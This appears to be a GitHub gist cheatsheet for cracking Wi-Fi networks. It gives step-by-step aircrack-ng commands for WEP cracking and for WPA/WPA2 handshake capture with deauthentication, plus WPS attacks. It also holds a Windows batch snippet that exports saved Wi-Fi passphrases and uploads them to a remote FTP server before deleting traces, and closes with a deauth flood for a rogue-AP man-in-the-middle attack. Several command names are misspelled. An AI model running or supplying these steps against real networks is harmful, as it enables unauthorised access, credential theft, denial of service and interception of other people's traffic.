Skip to content

Instantly share code, notes, and snippets.

@vv01f

vv01f/cheatsheet-howto-crack-wifi.md

Created February 16, 2016 15:12
Show Gist options
  • Save vv01f/92068346efe28ea81aaf to your computer and use it in GitHub Desktop.
Save vv01f/92068346efe28ea81aaf to your computer and use it in GitHub Desktop.
Download ZIP
some notes that I did a while ago; for WEP, WPA and WPA2
Raw
cheatsheet-howto-crack-wifi.md

you need

  • kali linux distribution
  • external alpha card and antenna

wardriving

capturing

list interfaces

airmoin-ng

shows the available interface

enable monitor mode

airmon-ng start wlan0

enabled monitor mode and list all processes that may cause trouble. That may be e.g. dhclient (DHCP client), the Network Manager or wpa_suppicant.

ensure no disturbance

kill 2222

so we just kill that processes, repeat if there are more.

find target

airodump ng wlan0

now the available APs are shown with some properties.

for WEP

copy the BSSID (MacAddress) of the target AP wiht WEP as CIPHER.

capture the data

airodump-ng  -c 10 -w dumpfile -bssid ${mac} mon0

now it is lisening for data. wait for #Data to be high

auth and cause traffic

beware, this is not to be used on foreign networks it can alert ids

airplay-ng -1 0 -a ${mac} mon0

ask for authentication

airplay-ng -1 1 -a ${mac} mon0

cause traffic, check if data goes up or channel is wrong if it is wrong, cancel and restart

airplay-ng -3 -b ${mac} mon0

wait for arp request

aircrack-ng dumpfile-0.cap

tries to crack if it fails try next cap file

if succeeded, key is found

WPA/WPA2

for WPA you need to enforce auth by a client

you will need a very good dictionary to crack the key

start monitor

airmon-ng start wlan0

kill the listed processes

get BSSID of target

airodump-ng wlan0

copy the mac address desired and memorize the channel

new terminal

airodump-ng -c $chan --bssid $mac -w ~/Desktop/dumpfile

dump the data, here handshakes are needed not just data you also see some more macs of connected stations that we soon need

force new handshakes

stop scanning instances if still running

airoplay-ng -0 -2 -a $ap-mac -c $client-mac mon0

repeat until it runds on the correct channel

this then deauthenticated the client and captures the handshake in the other instance

cracking cap file

after collecting some handshakes you might start the crack

aircrack-ng -a 2 -b $ap-mac -w wordlistfile ~/Desktop/*.cap

using reaver

an alternative to wordlists is wps reaver can obtain the password there

newer versions of wps are not vulnerable any more

using windows

in case wifi is secured properly you might attack a client e.g. windows is a good thing to find the passphrases in

on the machne try

copy passphrase

mkdir c:\temp
netsh wlan export profile folder=c:\temp
#netsh wlan add profile filename="theXMLexport.xml"

note that events on windows are logged by eventmanager!

::just to copy the file to a remote machine
@ftp -i -s:"%~f0"&GOTO:EOF
open server.net
my_username
my_password
!:---FTP commands following here---
cd location/for/storage
put c:\Temp\*.xml
disconnect
quit
::now delete traces

this is a snippet for connecting to ftp

show plaintext passphase on a windows

netsh
$ add profile filename="theXMLexport.xml" user=all
$ wlan show profiles

then open network settings for wifi there you can show the key

DOS AP

list networks again

copy the mac

find clients connected

airodump-ng -c $channel --bssid $ap-mac

now again you see the clients connected to the ap listed below this can be accomplished with the first instance using hotkeys a for switching views and s for sorting try finding an active client where DOS has a point

disconnect the target

aireplay-ng --deauth 1000 -a $ap-mac -c $client-mac mon0

this causes the client to loose connection and probably reconnect manually

now you can put a rogue ap that the client wants to connect to then after that yu have the possibility to be MITM of this clients connections as long as its not e2e encrypted

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment